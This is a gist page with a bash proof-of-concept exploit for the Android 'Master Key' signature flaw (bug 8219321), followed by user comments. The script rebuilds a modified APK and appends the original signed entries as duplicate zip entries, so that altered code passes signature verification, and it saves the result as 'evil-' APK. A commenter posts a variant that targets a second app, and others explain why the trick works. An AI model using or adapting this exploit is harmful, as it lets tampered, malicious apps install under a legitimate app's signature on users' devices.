secret
Created

Quick & dirty PoC for Android bug 8219321 discovered by BlueboxSec

  • Download Gist
gistfile1.sh
Shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
#!/bin/bash
# PoC for Android bug 8219321 by @pof
# +info: https://jira.cyanogenmod.org/browse/CYAN-1602
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
#apktool d $APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
java -jar apktool.jar b out out.apk
#apktool b out out.apk
mkdir tmp
cd tmp/
unzip ../$APK
mv ../out.apk .
cat >poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-$APK
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"

https://github.com/Fuzion24/AndroidMasterKeys/ I built a slightly more resilient tool. This also makes sure not to duplicate files that exist in the original application as well as compress the added files. Pythons zip append in the above script will only add files as STORED (no compression).

The apktools option are here: https://code.google.com/p/android-apktool/source/browse/brut.apktool/apktool-cli/src/main/java/brut/apktool/Main.java

  • d: decompile
  • b: build

So you simply decompile, modify and rebuild and ... Android does not recompute the hash ??

@BrunoVernay I'm duplicating entries inside the apk (original entries + rebuilt entries). The hashes in META-INF folder are from the original signed files, which are checked for signature, but the ones that end up being installed on the device are the duplicated ones.

Have you checked to see exactly which modified/duplicate files are getting installed & actually used? For example, try explicitly changing the AndroidManifest.xml.

Hi all, I modified the script so that it tackes two different files as parameters. This scenario is more realistic if we really want to leverage an attack with this technique. However, in doing so I was not able to install the repackaged application because of the "Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES]" error raised by ADB. But why this works when the two applications are the same (I verified that it does not raise any error) ? One explaination would be that in order to verify that the application is well signed, the package manager computes a hash of every file in the APK and then verifies that the hash of this list of hash is well signed. This is possible that the implementation manages the case where duplicated files are in the package. Thus two same hashes would be in the list only once and thus create a valid signature. I don't know how it is implemented but I would have done so. But to conclude, according to my experiments, this flaw can not be leveraged by attackers to sign malicious applications with certificates of benign applications. My Cyanogen version is 7.2.0 for WildfireS (not official).

NB: please let me know if I have made a mistake

Hereafter the code modified:

#!/bin/bash
if [ -z $1 ]; then echo "Usage: $0 " ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
echo "Modify files, when done type 'exit'"
cd out
#bash
cd ..
java -jar apktool.jar b out out.apk
mkdir tmp
cd tmp/
APK=../$2
unzip $APK
mv ../out.apk .
cat >poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in find . -type f |egrep -v "(poc.py|out.apk)" ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-app.apk
cd ..
rm -rf tmp out
echo "Modified APK: evil-app"

Found a open source scanner to detect this in Google code,

http://code.google.com/p/bluebox-3xp10it-scanner/

@poliva Thanks for sharing! :) How can you add duplicate entries inside the apk? Thanks in advance!

@poliva Thanks! :)

I tried with script. And also, ive tried adding duplicate classes.dex alone in the APK and trying to install on device, but unable to install.

Failure [INSTALL_PARSE_FAILED_CERTIFICATE_ENCODING]
Even with the old android, versions. Any idea on what am i missing?

Please sign in to comment on this gist.

Something went wrong with that request. Please try again.